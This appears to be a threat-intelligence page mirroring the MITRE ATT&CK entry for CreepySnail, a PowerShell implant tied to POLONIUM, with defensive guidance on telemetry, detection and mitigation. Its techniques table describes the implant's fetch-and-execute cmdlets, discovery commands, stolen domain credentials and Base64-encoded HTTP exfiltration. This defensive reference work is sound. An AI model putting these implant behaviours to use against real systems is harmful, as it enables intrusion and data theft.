S1024: CreepySnail
CreepySnail is a custom PowerShell implant that has been used by POLONIUM since at least 2022.[1]
Analyst context for executives and security teams
CreepySnail matters because it is a custom Windows PowerShell implant, not a commodity tool with a predictable product signature. MITRE reports it has been used by POLONIUM since at least 2022. For leaders, the practical issue is whether the organization can see PowerShell-based execution, discovery activity, domain account abuse, and web-based command-and-control patterns well enough to make fast incident decisions.
Executive priority
Prioritize this as a validation case for Windows endpoint visibility, identity monitoring, and outbound web traffic governance. The relationship set ties CreepySnail to discovery, PowerShell execution, domain account abuse, C2 over web protocols, standard encoding, and exfiltration over the C2 channel. Executives should ask whether SOC and IR teams can prove coverage for those behaviors, especially where business-critical Windows systems, domain accounts, sensitive data, or regulated environments are involved.
Technical view
MITRE provides no dedicated detection text for CreepySnail, so defenders should build coverage from the linked behaviors: T1059.001 PowerShell execution, T1033 user discovery, T1016 network configuration discovery, T1078.002 domain account abuse, T1071.001 web-protocol C2, T1132.001 standard encoding, and T1041 exfiltration over an existing C2 channel. Validate that Windows endpoint logs capture PowerShell process and script activity, that identity telemetry can show unusual domain account use, and that network telemetry can support investigation of suspicious HTTP/S communications and encoded payload patterns without relying on a single indicator.
Likely telemetry
- Windows endpoint process creation telemetry, especially powershell.exe or PowerShell host activity
- PowerShell script block, module, and command-line logging where enabled
- Windows security and authentication logs for domain account use
- Directory service or identity-provider telemetry for abnormal domain account behavior
- Endpoint evidence of user and system/network discovery commands
Detection direction
- Because official detection guidance is not provided, map detections to the related ATT&CK techniques rather than to the malware name alone.
- Tune PowerShell analytics for suspicious command lines, encoded content, remote execution patterns, and discovery commands, while accounting for legitimate administration scripts.
- Correlate discovery activity with subsequent outbound web traffic and domain account activity to reduce false positives from normal IT operations.
- Validate whether logs preserve enough command-line, script, user, host, destination, and timing context for incident reconstruction.
- Review blind spots around unmanaged Windows hosts, disabled PowerShell logging, limited proxy visibility, and service accounts with broad domain privileges.
Mitigation priorities
- Harden PowerShell use through least privilege, logging, constrained administration practices, and control of unnecessary script execution where operationally feasible.
- Strengthen domain account controls with least privilege, privileged access separation, service account review, and monitoring for abnormal use.
- Improve egress governance for web protocols by ensuring outbound traffic is logged, filtered where appropriate, and attributable to users and hosts.
- Prepare IR playbooks that connect endpoint PowerShell evidence, identity activity, and web traffic investigation into a single workflow.
- Use vulnerability and compliance programs to confirm that critical Windows assets have required logging, endpoint protection, and retention needed to support investigation.
Analyst notes and limits
The most useful defensive takeaway is not a malware signature; it is the behavior cluster around PowerShell, discovery, domain account use, web-based C2, encoding, and possible exfiltration over the same channel. This object is especially relevant for teams testing whether endpoint, identity, and network telemetry can be joined quickly during an investigation.
The supplied ATT&CK object has no official detection text, no aliases, and no malware-level tactics listed. Platform support is limited to Windows for the malware object, although some related techniques list broader platforms. Local environment evidence is required to determine exposure, detection coverage, or whether any activity is present.
CreepySnail
CreepySnail is a custom PowerShell implant that has been used by POLONIUM since at least 2022.[1]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1078.002 | Domain Accounts Sub-technique | CreepySnail can use stolen credentials to authenticate on target networks.CitationMicrosoft POLONIUM June 2022 |
| Enterprise | T1071.001 | Web Protocols Sub-technique | CreepySnail can use HTTP for C2.CitationMicrosoft POLONIUM June 2022 |
| Enterprise | T1016 | System Network Configuration Discovery | CreepySnail can use `getmac` and `Get-NetIPAddress` to enumerate network settings.CitationMicrosoft POLONIUM June 2022 |
| Enterprise | T1132.001 | Standard Encoding Sub-technique | CreepySnail can use Base64 to encode its C2 traffic.CitationMicrosoft POLONIUM June 2022 |
| Enterprise | T1059.001 | PowerShell Sub-technique | CreepySnail can use PowerShell for execution, including the cmdlets `Invoke-WebRequst` and `Invoke-Expression`.CitationMicrosoft POLONIUM June 2022 |
| Enterprise | T1041 | Exfiltration Over C2 Channel | CreepySnail can connect to C2 for data exfiltration.CitationMicrosoft POLONIUM June 2022 |
| Enterprise | T1033 | System Owner/User Discovery | CreepySnail can execute `getUsername` on compromised systems.CitationMicrosoft POLONIUM June 2022 |
Groups, software, and campaigns
G1005: POLONIUM
POLONIUM is a Lebanon-based group that has primarily targeted Israeli organizations, including critical manufacturing, information technology, and defense industry companies, since at least February 2022. Security researchers assess POLONIUM has coordinated their operations with multiple actors affiliated with Iran’s Ministry of Intelligence and Security (MOIS), based on victim overlap as well as common techniques and tooling.[1]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | b9504701c435… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Microsoft POLONIUM June 2022
Microsoft. (2022, June 2). Exposing POLONIUM activity and infrastructure targeting Israeli organizations. Retrieved July 1, 2022.
Open source URL -
[2]
mitre-attack S1024Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.